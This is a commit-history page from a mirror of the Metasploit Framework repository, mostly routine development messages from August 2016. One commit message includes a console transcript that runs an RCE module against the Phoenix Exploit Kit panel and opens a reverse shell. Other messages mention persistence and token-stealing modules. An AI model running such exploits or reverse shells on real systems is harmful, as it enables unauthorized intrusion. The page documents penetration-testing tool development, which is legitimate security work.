infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
39,552 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

39552 Commits (7762f42dfab70079d33762979074ab8767e35155)

Author SHA1 Message Date
David Maloney b6dff719f3
add a hard require to the ssh mixin 
added hard require for SSHFactory into the ssh exploit mixin
this should prevent any laod-order bugs from cropping up again
 2016-08-22 09:56:07 -05:00
Tim Wright 3955c4332d fix android autoload commands and sysinfo 2016-08-22 14:53:58 +01:00
h00die f2e2cb6a5e cant transfer file 2016-08-21 19:42:29 -04:00
h00die 6306fa5aa5 Per discussion in #7195, trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe) 2016-08-21 19:16:04 -04:00
Brandon Perry 2abf71a3ac Create zabbix_toggleids_sqli 2016-08-21 12:43:20 -05:00
Jay Turla 139d431230 eliminate space 2016-08-20 04:17:22 +08:00
dmohanty-r7 0c618cccef Use openvas-omp gem for crud operations 
MS-1718
 2016-08-19 15:14:32 -05:00
dmohanty-r7 4478136065 Unvendor openvas-omp gem 
MS-1718
 2016-08-19 15:14:32 -05:00
Jay Turla 51a2354fea Add KB for multi/http/caidao_php_backdoor_exec 2016-08-20 04:12:31 +08:00
Metasploit 87d34cfbba
Bump version of framework to 4.12.22 2016-08-19 10:02:28 -07:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
wchen-r7 265adebd50 Fix typo 2016-08-19 10:44:24 -05:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
Rob Fuller 42462f03e2
Land #7219, ps -c listing of child processes 
Awesome work by @wvu-r7 to help with identifying processes
started by the meterpreter session.
 2016-08-19 00:27:06 -04:00
William Vu 3d4d7aae14 Add ps -c to show child processes of current shell 2016-08-18 19:23:21 -05:00
wchen-r7 0f4d26af19 Update yard doc 2016-08-18 17:18:16 -05:00
wchen-r7 2a61450511 Add new POST exploitation APIs for stealing a token 2016-08-18 17:08:21 -05:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
James Lee 91417e62a8
Cleanup docs 2016-08-18 10:40:32 -05:00
William Vu bc9a402d9e
Land #7214, print_brute ip:rport fix 2016-08-17 22:48:40 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 2fa4c7073b
Land #6995, SSH key persistence module 2016-08-17 22:44:57 -05:00
wchen-r7 e154aafaaa On Error Resume Next for zip.vbs 2016-08-17 17:08:38 -05:00
wchen-r7 60937ec5e9 If user is SYSTEM, then steal a token before decompression 2016-08-17 16:56:09 -05:00
William Webb 667c3566e5
Land #7209, Add functionality to pull .NET versions on Windows hosts 2016-08-17 12:48:05 -05:00
William Vu 4228868c29 Clean up after yourself 
Can't use FileDropper. :(
 2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload 
pl is a cheap replacement.
 2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads 
Useful for testing and custom stuff.
 2016-08-16 23:08:09 -05:00
Brent Cook b37dc8ea27
Land #7210, allow send_request_cgi to close a non-global socket 2016-08-16 22:54:23 -05:00
Brendan b25b2a5188 Cleaned up code per suggestions in the PR 2016-08-16 16:16:25 -05:00
wchen-r7 5f8ef6682a Fix #7202, Make print_brute print ip:rport if available 
Fix #7202
 2016-08-16 15:34:30 -05:00
Brendan bf77e14bef
Land #7212, Revert back win32/win64 platform string for Windows meterpreter 2016-08-16 11:26:13 -05:00
David Maloney 42b1ced4fb
remove *scan from gemspec bins 
update the gemspec so that it doesn't try to build binstubs
for the *scan bins

MS-1691
 2016-08-16 09:33:09 -05:00
Brent Cook 870669bdf7 handle exception in getsystem module 2016-08-15 23:51:05 -05:00
Brent Cook e70402a130 use the platform string verbatim on windows meterpreter 2016-08-15 23:50:57 -05:00
wchen-r7 498657ab35 Fix #3860, tearing down TCP connection for send_request_cgi 
Fix #3860
 2016-08-15 15:45:52 -05:00
Brendan 0778b77f7b Cleaned up a little 2016-08-15 12:20:28 -07:00
David Maloney 8bece28d00
remove *scan bins as well 
all *scan bins need to be removed as the rex-bin_tools
gem will now handle these and put them in PATH

MS-1691
 2016-08-15 14:04:00 -05:00
David Maloney d2a6c2e9ca
move rex bintools into new gem 
move all the *scan *parsey code out into
the new rex-bin_tools gem

MS-1691
 2016-08-15 14:01:43 -05:00
Brendan 7730e0eb27 Added ability to retrieve .NET versions 2016-08-15 11:29:00 -07:00
Brendan 906d480264 Added dotnet require 2016-08-15 11:06:29 -07:00
William Vu 8c70086170
Land #7204, typo fix 
My favorite things to merge, @OJ. ;)
 2016-08-15 01:47:30 -05:00
William Vu 2fed51bb18
Land #7115, Drupal CODER exploit 2016-08-15 01:15:23 -05:00
William Vu 62d28f10cb Clean up Mehmet modules 2016-08-15 01:12:58 -05:00
Vlatko Kosturjak 46e4ee4c5b Start using gem instead of obsolete library/tool 
Rationale is following:
nessus-cli is obsolete
nessus is using json rest api instead of xmlrpc
xmlrpc name is therefore obsolete

Solution: with minimal changes start using nessus_rest gem.
 2016-08-14 17:57:33 +02:00